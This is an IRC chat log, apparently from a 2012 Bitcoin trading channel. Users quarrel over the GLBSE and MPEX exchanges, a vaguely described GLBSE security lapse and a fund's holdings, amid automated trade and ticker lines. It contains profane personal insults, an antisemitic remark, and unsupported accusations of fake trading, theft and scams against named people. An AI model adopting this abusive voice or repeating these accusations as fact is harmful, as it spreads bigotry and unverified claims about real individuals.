18:52:10 sigh. Sep 03 18:52:12 GLBSE is solid and secure Sep 03 18:52:32 why dont you try making your site useful Sep 03 18:52:34 heh nefario is here Sep 03 18:52:38 instead of attacking the competition Sep 03 18:52:40 that's not true. i am guessing you will keep pretending till someone really gets hurt huh. Sep 03 18:52:46 nefario: see url I told bot to tell you Sep 03 18:52:47 Diablo-D3: I got to london yesterday Sep 03 18:52:59 my laptop died Sep 03 18:53:03 had to replace it Sep 03 18:53:06 you're not my competition nefario. you are one of my brokers. not even in the top. AND YOU SUCK AT IT. Sep 03 18:53:11 which is why I've been offline so long Sep 03 18:53:14 nefario: isnt the point Sep 03 18:53:21 "Here's the scary part. GLBSE's 2FA measures might be buggy." <--- The guy doesn't know what the fuck happened Sep 03 18:53:22 nefario: this should have been done right the first time Sep 03 18:53:25 nefario: so just do it. Sep 03 18:53:26 mircea_popescu: you contradict yourself Sep 03 18:53:37 usagi: its buggy, but not in a non-secure way Sep 03 18:53:46 Diablo-D3: it's not buggy Sep 03 18:53:48 it's buggy in a secure way :D Sep 03 18:53:51 Tell us more about how MPEX does more volume in a week than GLBSE does in a month lol Sep 03 18:53:56 usagi just so. Sep 03 18:54:09 I watch this channel all day mircea Sep 03 18:54:09 nefario: it is. I can still type in 2fa auth codes at the start of the minute and still have them time out. Sep 03 18:54:13 thus, buggy Sep 03 18:54:20 It's obvious that GLBSE is 5x bigger than MPEX Sep 03 18:54:26 o really. Sep 03 18:54:29 ok ladies Sep 03 18:54:29 !ticker gigamining Sep 03 18:54:33 !ticker f.giga.etf Sep 03 18:54:33 [GLBSE:GIGAMINING] [Bid: 0.8131] [Ask: 0.8799] [Spread: 0.0668] [Last: 0.82] [24hVol: 536.3354351] [7dAvg: 0.8571493] Sep 03 18:54:34 I've got other shit to takle Sep 03 18:54:34 [MPEX:F.GIGA.ETF] 1day: 0.00080409 / 0.00086924 / 0.00092545 (194388 shares, 168.97 BTC), 30day: 0.00064789 / 0.00097598 / 0.00115139 (8682986 shares, 8,474.49 BTC) Sep 03 18:54:36 you know Sep 03 18:54:39 nefario: dont bother arguing with me on app design, just get the shit done. Sep 03 18:54:41 from having a real business and all Sep 03 18:54:43 so later Sep 03 18:54:44 o wow, for once it got volume! Sep 03 18:55:10 getting so tired of this. crap happens, nefario is in here denying, sock puppets in here claiming bs, Sep 03 18:55:13 two weeks go by Sep 03 18:55:21 glbse gets crapped again, rinse, repeat. Sep 03 18:55:27 peopel dun wanna do things right. Sep 03 18:55:45 [GLBSE] [PIMP] 1 @ 0.14999 BTC [-] Sep 03 18:55:52 fuck off mircea_popescu Sep 03 18:56:08 dude, your nonbusiness is waiting for moar useless crap. Sep 03 18:56:09 Diablo-D3: does that help? Sep 03 18:56:34 Diablo-D3 http://polimedia.us/dtng/c/src/134664034775.jpg ? Sep 03 18:56:34 [GLBSE] [YABMC] 2 @ 0.1183 = 0.2366 BTC [-] Sep 03 18:56:35 [MPEX] [O.BTCUSD.C090T] 779 @ 0.25713222 = 200.306 BTC [+] Sep 03 18:56:57 now mircea_popescu has to go and outdo my effort Sep 03 18:56:59 :( Sep 03 18:57:06 i was here first! Sep 03 18:57:28 :( Sep 03 18:57:31 [GLBSE] [PUREMINING] 1 @ 0.0933 BTC [-] Sep 03 18:57:43 oh mircea_popescu, remember when you said I had to lower GLBSE's transfer price to compete with you on the GIGAMINING thing? Sep 03 18:57:58 yes. Sep 03 18:58:00 ciuciu: let me guess, you're here to fight! Sep 03 18:58:04 you had it backwards Sep 03 18:58:07 we had no fee Sep 03 18:58:16 and raised it to 0.2% Sep 03 18:58:24 jesus fucking christ. Sep 03 18:58:26 nefario Sep 03 18:58:29 mircea_popescu Sep 03 18:58:32 [GLBSE] [ASICMINER] 4 @ 0.122 = 0.488 BTC [-] Sep 03 18:58:33 both of you just shut the fuck up Sep 03 18:58:41 you're both useless fucks. Sep 03 18:58:45 lol Sep 03 18:58:46 ne neneneeener Sep 03 18:58:48 ciuciu: mircea_popescu is unhappy because im here Sep 03 18:58:49 write an STM implementation already Sep 03 18:58:57 [GLBSE] [FDBF] 14 @ 0.14999999 = 2.1 BTC [+] Sep 03 18:58:57 and GLBSE is so popular Sep 03 18:58:57 copumpkin: what the fuck does that do Sep 03 18:59:08 copumpkin and fractional shares. Sep 03 18:59:11 what the fuck does an STM implementation do? Sep 03 18:59:21 it implements STM, of course Sep 03 18:59:27 copumpkin: no, what the fuck does an STM implementation do for this Sep 03 18:59:31 oh, nothing Sep 03 18:59:33 [GLBSE] [UDN] 10 @ 0.099888 = 0.9989 BTC [-] Sep 03 18:59:34 [GLBSE] [PAJKA.BOND] 2 @ 0.06 = 0.12 BTC [-] Sep 03 18:59:36 [GLBSE] [BITBOND] 50 @ 0.41611 = 20.8055 BTC [+] Sep 03 18:59:37 [GLBSE] [BITBOND] 5 @ 0.4161 = 2.0805 BTC [-] Sep 03 18:59:37 [GLBSE] [BITBOND] 30 @ 0.415 = 12.45 BTC [-] Sep 03 18:59:39 [GLBSE] [BITBOND] 3 @ 0.41011 = 1.2303 BTC [-] Sep 03 18:59:40 [GLBSE] [BITBOND] 6 @ 0.41 = 2.46 BTC [-] Sep 03 18:59:40 Quote from nedbert9: "neither Nefario or I know exactly what happened." <--- mircea, stfu Sep 03 18:59:41 [GLBSE] [BITBOND] 10 @ 0.41 = 4.1 BTC [-] Sep 03 18:59:42 it's more useful than bickering in here though Sep 03 18:59:42 nefario is paid to do a fucking job Sep 03 18:59:42 [GLBSE] [BITBOND] 9 @ 0.4052 = 3.6468 BTC [-] Sep 03 18:59:43 [GLBSE] [BITBOND] 15 @ 0.40510001 = 6.0765 BTC [-] Sep 03 18:59:44 [GLBSE] [BITBOND] 18 @ 0.4044 = 7.2792 BTC [-] Sep 03 18:59:45 [GLBSE] [BITBOND] 9 @ 0.401 = 3.609 BTC [-] Sep 03 18:59:46 [GLBSE] [BITBOND] 20 @ 0.4003 = 8.006 BTC [-] Sep 03 18:59:47 [GLBSE] [BITBOND] 25 @ 0.4 = 10 BTC [-] Sep 03 18:59:52 I expect it to be done. Sep 03 19:00:11 Diablo-D3 wants his dick sucked again Sep 03 19:00:23 I pity nefario sometimes Sep 03 19:00:24 and I expect mircea_popescu to shut the fuck up because no one cares about mpex Sep 03 19:00:52 nedbert9 quote on session hijacking: "Edit: Some have jumped to the conclusion that this *IS* what happened. This is my best assumption. I" Sep 03 19:00:58 [GLBSE] [MOORE] 8 @ 0.5084 = 4.0672 BTC [-] Sep 03 19:01:07 no one uses it, especially if you have to pay 20 BTC to get an account to buy stock. Sep 03 19:01:14 ciuciu: wait, are you eskimobob? Sep 03 19:01:20 Diablo-D3 people who can afford 200 bucks use it. Sep 03 19:01:25 why are people so obsessed with mircea_popescu's porn career? Sep 03 19:01:28 mircea_popescu: which is no one. so shut the fuck up. Sep 03 19:01:30 [GLBSE] [OBSI.HRPT] 2 @ 0.1029 = 0.2058 BTC [-] Sep 03 19:02:04 ciuciu: he has more buttsecks in a month than all of the rest of us combined in a lifetime Sep 03 19:02:05 but it's okay Sep 03 19:02:16 I get all the pumpkins Sep 03 19:02:25 copumpkin: he could have buttsecks once and have more than I have had in my lifetime. Sep 03 19:02:29 Diablo-D3 if it's no one then i dunno what are you talking about, "finance", "stock exchange" etc. Sep 03 19:02:45 mircea_popescu: do. not. care. just shut up about it. Sep 03 19:02:47 also im sure he doesn't mean receiving buttseks Sep 03 19:02:50 no! Sep 03 19:02:59 yes! Sep 03 19:03:00 well, both ways Sep 03 19:03:05 no one fucking cares. Sep 03 19:03:14 its a fucking dick size contest between you and nefario, and NO ONE ELSE CARES Sep 03 19:03:17 so shut the fuck up Sep 03 19:03:45 no cause my dick is bigger than yours. Sep 03 19:03:53 lol Sep 03 19:03:55 :D Sep 03 19:04:14 not in a million years, mircea_popescu. Sep 03 19:04:21 why do you have such a small pecker anyway ? Sep 03 19:04:42 [GLBSE] [YABMC] 1 @ 0.1183 BTC [-] Sep 03 19:06:38 mircea_popescu: okay, we can continue this and I can recommend theymos add a scammer tag to your forum account, or you can shut up. Sep 03 19:07:04 o, you abuse teh scammer tags on the forum ? Sep 03 19:07:09 ask him to give you one, while you're at it. Sep 03 19:08:07 ciuciu: there isnt any simply because of the fact there is no trading on mpex. Sep 03 19:08:17 Diablo-D3: explain Sep 03 19:08:26 nefario: explain what. Sep 03 19:08:30 lol you walked into that one Sep 03 19:08:38 never ask diablo to explain something Sep 03 19:08:39 that there is no trading on mpex Sep 03 19:08:42 there is more volume on mpex than in dmc Sep 03 19:08:49 where do you get that information? Sep 03 19:08:57 dmc has volume ?! Sep 03 19:08:59 nefario: its just like pirate and bitcoinica, I refuse to believe anyone who uses bitcoin is that stupid Sep 03 19:09:07 ? Sep 03 19:09:08 its just a bunch of sock puppet accounts to make it look like people did Sep 03 19:09:31 what are you saying fake trades to boost numbers? Sep 03 19:09:37 nefario: yup. Sep 03 19:10:27 don't forget the fake ipos. Sep 03 19:10:34 If I had 100 btc of margin and did an options split it would create 200 btc of volume out of 0 actual bitcoins traded. Sep 03 19:10:42 ciuciu: the insider trading was prolly the wrong term to use Sep 03 19:11:01 usagi that's not true. splits aren't reported as trades. Sep 03 19:11:07 you'd have to sell your puts/calls to someone. Sep 03 19:11:16 what mircea was talking about was someone using foreknowledge of a big price drop to take advantage of mpex Sep 03 19:11:26 and because a call/put doesn't sell for 1 in general, and never sells for as much as the deposit is, thiswould yield less than 100 btc of trade. Sep 03 19:11:47 everyone can lose Sep 03 19:11:58 (except for me) Sep 03 19:12:03 because my schlong is so long Sep 03 19:12:07 (you just can't gain0 Sep 03 19:12:11 it ain't a schlort, is it Sep 03 19:12:23 mircea_popescu :( Sep 03 19:12:29 I wanna make loadsa money Sep 03 19:12:32 (hey, no gain, no pain) Sep 03 19:12:32 buttloads Sep 03 19:13:00 smickles well that'd be insider trading neh ? Sep 03 19:13:10 outsider trading Sep 03 19:13:14 But when someone buys it, it is counted as a trade. Sep 03 19:13:18 obviously it's insider as to the underlying. Sep 03 19:13:29 usagi whenever someone buys something it's counted as trade yes. Sep 03 19:13:37 scam! Sep 03 19:13:38 does it count as inside trading if you work at S&P and short a market index before a ratings downgrade? Sep 03 19:13:38 So two people on margin can create X volume out of nothing. Sep 03 19:13:57 copumpkin you'd be in jail no ? Sep 03 19:14:16 you can do it, you just can't lie to investigators about it Sep 03 19:14:19 usagi no, they create volume out of their trading. Sep 03 19:14:19 [GLBSE] [TYGRR.BOND-P] 1 @ 0.1 BTC [+] Sep 03 19:14:23 mircea_popescu: I dunno :) it's not insider, since it's the entire economy, but I know ratings agencies have special regulation Sep 03 19:14:23 I just don't know how strong it is Sep 03 19:14:52 i dunno anymore either tbh, Sep 03 19:14:56 it changes with the seasons. Sep 03 19:17:33 [GLBSE] [GIGAMINING] 1 @ 0.8789 BTC [+] Sep 03 19:17:34 [MPEX] [S.MPOE] 30100 @ 0.00038699 = 11.6484 BTC [+] Sep 03 19:17:36 [MPEX] [S.MPOE] 684 @ 0.0003862 = 0.2642 BTC [-] Sep 03 19:17:37 [MPEX] [S.MPOE] 30000 @ 0.000386 = 11.58 BTC [-] Sep 03 19:17:38 [MPEX] [S.MPOE] 3016 @ 0.00038597 = 1.1641 BTC [-] Sep 03 19:17:52 sweet goatse goatseness, i've got a lot of goatse Sep 03 19:18:27 [GLBSE] [CIUCIU.BOND] 160 @ 0.1011 = 16.176 BTC [+] Sep 03 19:18:29 [GLBSE] [CIUCIU.BOND] 20 @ 0.1011 = 2.022 BTC [+] Sep 03 19:18:30 [GLBSE] [CIUCIU.BOND] 47 @ 0.1015 = 4.7705 BTC [+] Sep 03 19:18:31 [GLBSE] [CIUCIU.BOND] 12 @ 0.11 = 1.32 BTC [+] Sep 03 19:18:33 [GLBSE] [CIUCIU.BOND] 233 @ 0.11 = 25.63 BTC [+] Sep 03 19:21:20 [GLBSE] [BITCOINRS] 4 @ 0.05 = 0.2 BTC [-] Sep 03 19:21:28 [GLBSE] [OBSI.HRPT] 13 @ 0.1029 = 1.3377 BTC [-] Sep 03 19:21:30 [GLBSE] [OBSI.HRPT] 99 @ 0.1029 = 10.1871 BTC [-] Sep 03 19:21:31 [GLBSE] [OBSI.HRPT] 20 @ 0.1033 = 2.066 BTC [+] Sep 03 19:21:32 [GLBSE] [OBSI.HRPT] 3 @ 0.1034 = 0.3102 BTC [+] Sep 03 19:21:34 [GLBSE] [OBSI.HRPT] 15 @ 0.1035 = 1.5525 BTC [+] Sep 03 19:27:56 [GLBSE] [DMC] 1 @ 0.075 BTC [-] Sep 03 19:29:36 kakobrekla ping Sep 03 19:29:59 [MPEX] [S.MPOE] 200 @ 0.00038783 = 0.0776 BTC [+] Sep 03 19:30:00 [MPEX] [S.MPOE] 39300 @ 0.00038815 = 15.2543 BTC [+] Sep 03 19:31:06 [GLBSE] [GMVT-BOT] 3 @ 0.111 = 0.333 BTC [-] Sep 03 19:31:07 [GLBSE] [GMVT-BOT] 1 @ 0.11 BTC [-] Sep 03 19:32:59 [GLBSE] [BITBOND] 9 @ 0.401 = 3.609 BTC [+] Sep 03 19:34:16 [GLBSE] [BITBOND] 491 @ 0.4 = 196.4 BTC [-] Sep 03 19:36:33 pah, and this chan was so interesting earlier. Diablo-D3 come back! Sep 03 19:36:45 im sorry for what i said about your pecker! Sep 03 19:37:30 mircea_popescu pong Sep 03 19:37:42 o hey. try sending me a tiny transfer. Sep 03 19:38:56 [GLBSE] [GMVT-BOT] 2 @ 0.1299 = 0.2598 BTC [+] Sep 03 19:39:21 [GLBSE] [GMVT-BOT] 2 @ 0.1299 = 0.2598 BTC [+] Sep 03 19:41:11 anyway, i'm kinda fascinated nefario finally admitted as to the entire goat&co conspiracy to make fake trades so global scam exchange thingee looks like it has volume. Sep 03 19:41:19 been suspecting this for months. Sep 03 19:41:42 [GLBSE] [M.ETF] 7 @ 0.12 = 0.84 BTC [+] Sep 03 19:41:46 you always know when someone is an asshole Sep 03 19:41:59 everytime they open their mouth shit pours out Sep 03 19:42:19 aww, ad personam ? so soon ? Sep 03 19:42:22 nefario: what does president bush have to do with this? Sep 03 19:43:00 [GLBSE] [ARS] 25 @ 0.015 = 0.375 BTC [+] Sep 03 19:43:07 in the immortal words of my favourite guy in btcland, "it doesn't matter if someone's a child murdering nazi, as long as they have a point" Sep 03 19:43:33 mircea_popescu: who is this guy? he sounds awesome Sep 03 19:43:47 he is awesome. just took that scammer pirate for 5k btc, too Sep 03 19:44:03 tell me this man's name! Sep 03 19:44:10 you know him as Sep 03 19:44:10 I have a newsletter to subscribe to! Sep 03 19:44:21 sexy Sep 03 19:45:12 Vandroiy! Sep 03 19:45:49 [GLBSE] [BDT] 4 @ 1.01 = 4.04 BTC [-] Sep 03 19:46:36 mircea_popescu: oh, him Sep 03 19:46:42 yeah. Sep 03 19:48:41 [GLBSE] [BDT] 10 @ 1.025 = 10.25 BTC [+] Sep 03 19:49:50 [GLBSE] [FPGAMINING] 5 @ 0.725 = 3.625 BTC [-] Sep 03 19:50:33 [GLBSE] [NYAN.C] 1 @ 0.69 BTC [+] Sep 03 19:50:37 [GLBSE] [DMC] 1 @ 0.06 BTC [-] Sep 03 19:51:08 [GLBSE] [NYAN] 1 @ 1 BTC [-] Sep 03 19:51:19 [GLBSE] [ASICMINER] 2 @ 0.12500001 = 0.25 BTC [+] Sep 03 19:51:21 [GLBSE] [ASICMINER] 8 @ 0.125 = 1 BTC [-] Sep 03 19:51:27 [MPEX] [O.BTCUSD.C100T] 760 @ 0.19776462 = 150.3011 BTC [+] Sep 03 19:51:48 [GLBSE] [GSDPT] 9000 @ 0.003393 = 30.537 BTC [-] Sep 03 19:51:54 [MPEX] [F.GIGA.ETF] 5600 @ 0.00086172 = 4.8256 BTC [+] Sep 03 19:52:02 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.15089243 = 150.8924 BTC [+] Sep 03 19:55:14 [GLBSE] [FPGAMINING] 1 @ 0.734 BTC [+] Sep 03 19:56:29 [GLBSE] [PUREMINING] 22 @ 0.0933 = 2.0526 BTC [-] Sep 03 19:56:30 [GLBSE] [PUREMINING] 46 @ 0.0934 = 4.2964 BTC [+] Sep 03 19:56:32 [GLBSE] [PUREMINING] 99 @ 0.0934 = 9.2466 BTC [+] Sep 03 19:56:33 [GLBSE] [PUREMINING] 77 @ 0.093499 = 7.1994 BTC [+] Sep 03 19:56:33 [GLBSE] [PUREMINING] 4 @ 0.0935 = 0.374 BTC [+] Sep 03 19:56:34 [GLBSE] [PUREMINING] 5 @ 0.0936 = 0.468 BTC [+] Sep 03 19:56:36 [GLBSE] [PUREMINING] 95 @ 0.0938 = 8.911 BTC [+] Sep 03 19:56:37 [GLBSE] [PUREMINING] 131 @ 0.09399 = 12.3127 BTC [+] Sep 03 19:59:25 [GLBSE] [M.ETF] 3 @ 0.12 = 0.36 BTC [+] Sep 03 20:05:29 [GLBSE] [BITBOND] 9 @ 0.401 = 3.609 BTC [+] Sep 03 20:09:31 [GLBSE] [GIGAMINING] 1 @ 0.82100001 BTC [-] Sep 03 20:10:58 [GLBSE] [GIGAMINING] 1 @ 0.821 BTC [-] Sep 03 20:11:31 [GLBSE] [BITBOND] 1 @ 0.4 BTC [-] Sep 03 20:13:20 [GLBSE] [YABMC] 2 @ 0.1095 = 0.219 BTC [-] Sep 03 20:14:21 [GLBSE] [MERGEDMINING] 1 @ 0.075 BTC [-] Sep 03 20:15:02 [GLBSE] [YABMC] 10 @ 0.109 = 1.09 BTC [-] Sep 03 20:15:46 [GLBSE] [SILVER] 100 @ 0.01 = 1 BTC [+] Sep 03 20:16:00 [GLBSE] [YABMC] 37 @ 0.1081 = 3.9997 BTC [-] Sep 03 20:16:48 Diablo-D3: I atempted to figure out, where did you put all the BTC from DMC account and it not looking right. Can you take a look and tell me were did I made mistakes Sep 03 20:17:29 [GLBSE] [BMF] 50 @ 0.59499 = 29.7495 BTC [-] Sep 03 20:17:37 [GLBSE] [JAH] 2 @ 0.15 = 0.3 BTC [-] Sep 03 20:17:38 [GLBSE] [YABMC] 10 @ 0.108 = 1.08 BTC [-] Sep 03 20:18:29 Diablo-D3: https://bitcointalk.org/index.php?topic=77469.msg1157144#msg1157144 Sep 03 20:18:36 the plot thickens Sep 03 20:18:58 eskimobob: nope, Im unsubscribing from the dmc thread. Sep 03 20:18:59 [GLBSE] [YABMC] 14 @ 0.10621 = 1.4869 BTC [-] Sep 03 20:19:43 you're on your own, trollbob. Sep 03 20:20:52 [GLBSE] [GSDPT] 25 @ 0.003393 = 0.0848 BTC [-] Sep 03 20:21:38 Diablo-D3: what are you taking about? Sep 03 20:22:01 I asked you a question and this is how you reply? Sep 03 20:22:07 [GLBSE] [OBSI.HRPT] 1 @ 0.1034 BTC [-] Sep 03 20:22:18 eskimobob: you asked to help you document DMC's awesomeness. Sep 03 20:22:33 Diablo-D3: are you drunk? Sep 03 20:22:38 DMC's awesomeness cannot be quantified using any form of math currently in existence Sep 03 20:23:15 you should start a yoga group. Sep 03 20:23:30 a yogurt group! Sep 03 20:23:38 I want greek yogurt with strawberries in it Sep 03 20:23:43 are you telling me you stole over 500 BTC from DMC account? Sep 03 20:23:48 [GLBSE] [OBSI.HRPT] 3 @ 0.1034 = 0.3102 BTC [-] Sep 03 20:23:53 nope, Im saying it didnt exist. Sep 03 20:24:26 eskimobob: btw, heres a curveball: we have the same number of shares, yet value at current market value is almost 1600 BTC. Sep 03 20:24:40 omg math Sep 03 20:24:54 wtf is a curveball? Sep 03 20:25:02 a ball that isn't square Sep 03 20:25:14 a ball that was dropped a lot. Sep 03 20:25:19 [GLBSE] [BIB.PIRATE] 2 @ 0.1 = 0.2 BTC [+] Sep 03 20:25:37 copumpkin: yeah a yogurt group, maybe then he'll have a little culture :p Sep 03 20:25:43 [GLBSE] [HYDRO.BONDS] 1 @ 1.57 BTC [-] Sep 03 20:25:46 omg you think I have no culture! Sep 03 20:25:51 I just drank a bottle of kombucha ffs Sep 03 20:25:58 cool true ? Sep 03 20:26:11 eskimobob: a curveball is a sports analogy. Sep 03 20:26:13 seriously! Sep 03 20:26:52 [GLBSE] [OBSI.HRPT] 3 @ 0.1034 = 0.3102 BTC [-] Sep 03 20:27:20 eskimobob: so, can your math explain how I went from ~1250 to almost 1600 BTC in the span of like 3 days Sep 03 20:27:35 If DMC still has same portfolio, as few days ago, it only worth about 1228 BTC and not 1600 Sep 03 20:27:45 this sounds like that riddle about the hotel bellboy getting tipped Sep 03 20:27:54 what changed? Sep 03 20:28:02 I drank this thing, but I think the site is down: http://www.synergydrinks.com/enlightened/synergy_enlightened_raspberryChia.aspx Sep 03 20:28:20 eskimobob: DMC has a similar portoflio. Sep 03 20:28:24 *portfolio Sep 03 20:28:46 "similar" is not "same" Sep 03 20:28:55 eskimobob it prolly has something to do with this : http://trilema.com/2012/lolvacute-pentru-posteritate/ Sep 03 20:29:18 mircea_popescu: no one reads polish Sep 03 20:29:30 its an english chatlog. Sep 03 20:29:31 mircea_popescu: fuck off with your URL's, thank you. Sep 03 20:29:43 I dont care what it is Sep 03 20:29:43 you recall, the discussion of the trading whatever for whatever else. Sep 03 20:29:59 well d'oh. nobody cares what reality is anymore Sep 03 20:30:04 everyone got his own private fantasyland. Sep 03 20:30:07 fuck off mircea_popescu Sep 03 20:30:10 mircea_popescu: also, the stuff you quoted isnt even complete Sep 03 20:30:13 and its rather random Sep 03 20:30:13 like Sep 03 20:30:23 2:16:59 coingenuity: didnt i buy some dmc? Sep 03 20:30:23 what do you mean it's not complete ? Sep 03 20:30:24 2:17:01 Diablo-D3: I just published it Sep 03 20:30:24 2:17:08 coingenuity: i have no idea Sep 03 20:30:24 2:17:09 Diablo-D3: coingenuity: dunno, did you? Sep 03 20:30:34 you missed the part where coingenuity says he doesnt have a glbse account Sep 03 20:30:41 thus cannot have traded into DMC Sep 03 20:31:05 oh wait sorry Sep 03 20:31:10 thats the part you quote right after Sep 03 20:31:16 whitespace is bad for your health Sep 03 20:31:25 mk Sep 03 20:32:16 though, if obsi DOES own quite a few dmc Sep 03 20:32:25 and dmc owns a large number of abmo shares Sep 03 20:32:34 INFINITE POWAR Sep 03 20:32:41 ohshi- Sep 03 20:33:52 https://bitcoinfunding.com/ << the best bitcoin fundraising service on the planet, it says. anyone know it ? Sep 03 20:34:01 never heard of them Sep 03 20:34:37 me either. maybe we're on a different planet. Sep 03 20:36:00 !ticker btc-mining Sep 03 20:36:02 !ticker btcmc Sep 03 20:36:05 !ticker obsi.abmo Sep 03 20:36:22 glbse down :( Sep 03 20:36:48 well fuck. Sep 03 20:37:00 eskimobob: what was your last prices for those three Sep 03 20:37:00 [GLBSE:BTC-MINING] [Bid: 0.9] [Ask: 0.99998] [Spread: 0.09998] [Last: 0.99998] [24hVol: 34.95919] [7dAvg: 0.96944578] Sep 03 20:37:08 _lol_ Sep 03 20:37:09 [GLBSE:BTCMC] [Bid: 0.5011] [Ask: 0.5899] [Spread: 0.0888] [Last: 0.5001] [24hVol: ] [7dAvg: 0.45204] Sep 03 20:37:13 [GLBSE:OBSI.ABMO] [Bid: 0.0002] [Ask: 0.087] [Spread: 0.0868] [Last: 0.087] [24hVol: 0.522] [7dAvg: 0.0816923] Sep 03 20:37:20 Diablo-D3: what 3? Sep 03 20:37:27 nm Sep 03 20:37:29 bot got them Sep 03 20:37:52 Rabbi Issamar Ginzberg is an award winning business strategist and marketing consultant that currently accepts bitcoin for a limited number of hours each month. Sep 03 20:37:58 dang jooz taking over btc. Sep 03 20:38:02 >rabbi Sep 03 20:38:07 wat. Sep 03 20:38:38 BTC-MINING 0.99998 Sep 03 20:38:41 BTCMC 0.5001 Sep 03 20:38:43 OBSI.ABMO 0.087 Sep 03 20:38:45 ASICMINER 0.129 Sep 03 20:38:47 jooz don't believe in jebus Sep 03 20:38:55 but those are 1 h old or so Sep 03 20:39:43 http://www.btcvc.com/index.php/btcvc-startups/ bitcoin vc ? Sep 03 20:39:55 jesus this stuff is better than the funny papers. Sep 03 20:40:09 eskimobob: exact asset count atm is 1407.74 Sep 03 20:40:19 obsi.abmo went down from last time I did the math Sep 03 20:40:26 [MPEX] [S.DICE] 388 @ 0.0034 = 1.3192 BTC [+] Sep 03 20:43:18 if you don't believe in jebus, the christophiliacs say you go to heck Sep 03 20:43:23 http://imgur.com/gallery/fULsq Sep 03 20:44:54 [GLBSE] [RAREEARTH] 44 @ 0.0096 = 0.4224 BTC [+] Sep 03 20:45:39 http://imgur.com/gallery/XbSTl Sep 03 20:46:52 [GLBSE] [ASICMINER] 4 @ 0.132 = 0.528 BTC [+] Sep 03 20:48:57 [GLBSE] [TYGRR.BOND-P] 29 @ 0.075 = 2.175 BTC [-] Sep 03 20:53:48 [GLBSE] [ARS] 1 @ 0.0147 BTC [-] Sep 03 20:54:02 [GLBSE] [NYAN] 9 @ 1 = 9 BTC [-] Sep 03 20:54:09 !ticker FDBF Sep 03 20:54:22 [GLBSE:FDBF] [Bid: 0.149] [Ask: 0.14999999] [Spread: 0.00099999] [Last: 0.14999999] [24hVol: 38.09998324] [7dAvg: 0.14774561] Sep 03 20:54:40 erm Sep 03 20:54:43 nyan? Sep 03 20:54:47 what happened to the sub nyans Sep 03 20:55:03 [GLBSE] [NYAN.A] 25 @ 1 = 25 BTC [-] Sep 03 20:55:17 question answered. Sep 03 20:56:36 [GLBSE] [FPGAMINING] 16 @ 0.734 = 11.744 BTC [+] Sep 03 20:57:09 [GLBSE] [BBBB] 400 @ 0.00024 = 0.096 BTC [+] Sep 03 21:02:23 [GLBSE] [ASICMINER] 3 @ 0.12600001 = 0.378 BTC [-] Sep 03 21:10:15 [GLBSE] [ASICMINER] 40 @ 0.126 = 5.04 BTC [-] Sep 03 21:10:17 [GLBSE] [ASICMINER] 1 @ 0.126 BTC [-] Sep 03 21:15:20 Diablo-D3: NYAN is Nyancat Financial, which profits exclusively through operations, and holding NYAN.A, NYAN.B and NYAN.C. Sep 03 21:15:30 [GLBSE] [ASICMINER] 2 @ 0.12500001 = 0.25 BTC [-] Sep 03 21:16:28 [GLBSE] [ABM] 2 @ 0.1 = 0.2 BTC [-] Sep 03 21:16:29 [GLBSE] [ABM] 1 @ 0.1 BTC [-] Sep 03 21:16:45 [MPEX] [S.DICE] 5000 @ 0.0034 = 17 BTC [+] Sep 03 21:17:19 gah someone ping tiggr Sep 03 21:18:26 [GLBSE] [ASICMINER] 6 @ 0.125 = 0.75 BTC [-] Sep 03 21:18:39 SuprTiggr hey fix the bot! Sep 03 21:18:42 [GLBSE] [ASICMINER] 48 @ 0.125 = 6 BTC [-] Sep 03 21:18:47 [GLBSE] [SILVER] 5 @ 0.01 = 0.05 BTC [+] Sep 03 21:19:02 tiggr added to ignore list. Sep 03 21:21:32 [GLBSE] [MMM] 1 @ 0.9 BTC [+] Sep 03 21:22:46 [GLBSE] [GMVT-BOT] 3 @ 0.1299 = 0.3897 BTC [+] Sep 03 21:25:27 !ticker yarr Sep 03 21:25:29 [GLBSE:YARR] [Bid: 1.06] [Ask: 1.49] [Spread: 0.43] [Last: 1.06] [24hVol: 313.05874] [7dAvg: 0.9990411] Sep 03 21:26:28 [MPEX] [F.GIGA.ETF] 11200 @ 0.00086172 = 9.6513 BTC [+] Sep 03 21:26:29 [MPEX] [F.GIGA.ETF] 5700 @ 0.0008618 = 4.9123 BTC [+] Sep 03 21:26:30 [MPEX] [F.GIGA.ETF] 3100 @ 0.00086192 = 2.672 BTC [+] Sep 03 21:27:05 [MPEX] [S.MPOE] 200 @ 0.00038641 = 0.0773 BTC [-] Sep 03 21:27:06 [MPEX] [S.MPOE] 1258 @ 0.00038597 = 0.4856 BTC [-] Sep 03 21:27:07 [MPEX] [S.MPOE] 9480 @ 0.00038587 = 3.658 BTC [-] Sep 03 21:27:08 [MPEX] [S.MPOE] 6100 @ 0.00038579 = 2.3533 BTC [-] Sep 03 21:27:10 [MPEX] [S.MPOE] 8400 @ 0.0003857 = 3.2399 BTC [-] Sep 03 21:27:29 [GLBSE] [UDN] 20 @ 0.099888 = 1.9978 BTC [-] Sep 03 21:30:15 [GLBSE] [GMVT-BOT] 22 @ 0.1299 = 2.8578 BTC [+] Sep 03 21:30:42 [GLBSE] [NYAN.C] 10 @ 0.69 = 6.9 BTC [+] Sep 03 21:31:28 [GLBSE] [NYAN.B] 24 @ 1 = 24 BTC [-] Sep 03 21:31:41 [GLBSE] [PUREMINING] 4 @ 0.0942 = 0.3768 BTC [+] Sep 03 21:32:03 /mode +b ~MrTiggr@ec2-122-248-235-44.ap-southeast-1.compute.amazonaws.com Sep 03 21:32:18 kakobrekla doesn't like ops Sep 03 21:32:25 well me either tbh Sep 03 21:32:31 [GLBSE] [FDBF] 30 @ 0.14999999 = 4.5 BTC [+] Sep 03 21:32:47 but this sorta stuff is making the chan unusable Sep 03 21:32:51 and we must have our drama! Sep 03 21:32:57 :D Sep 03 21:33:16 [GLBSE] [BDT] 6 @ 1.04 = 6.24 BTC [+] Sep 03 21:34:11 hm Sep 03 21:34:12 lol Sep 03 21:34:16 lol Sep 03 21:34:33 cmon kakobrekla Sep 03 21:34:34 you can do it Sep 03 21:35:01 now careful not to kick his other guys Sep 03 21:35:47 oh also Sep 03 21:36:12 thar. Sep 03 21:37:58 [GLBSE] [CPA] 40 @ 0.06 = 2.4 BTC [+] Sep 03 21:42:31 [GLBSE] [ASICMINER] 2 @ 0.12500001 = 0.25 BTC [+] Sep 03 21:43:17 [GLBSE] [BTC-BOND] 9008 @ 0.01 = 90.08 BTC [+] Sep 03 21:45:54 [GLBSE] [FDBF] 4 @ 0.14999999 = 0.6 BTC [+] Sep 03 21:50:25 [GLBSE] [TYGRR.BOND-P] 40 @ 0.1 = 4 BTC [+] Sep 03 21:51:22 /j #dramalopticon Sep 03 21:51:28 er, misfire 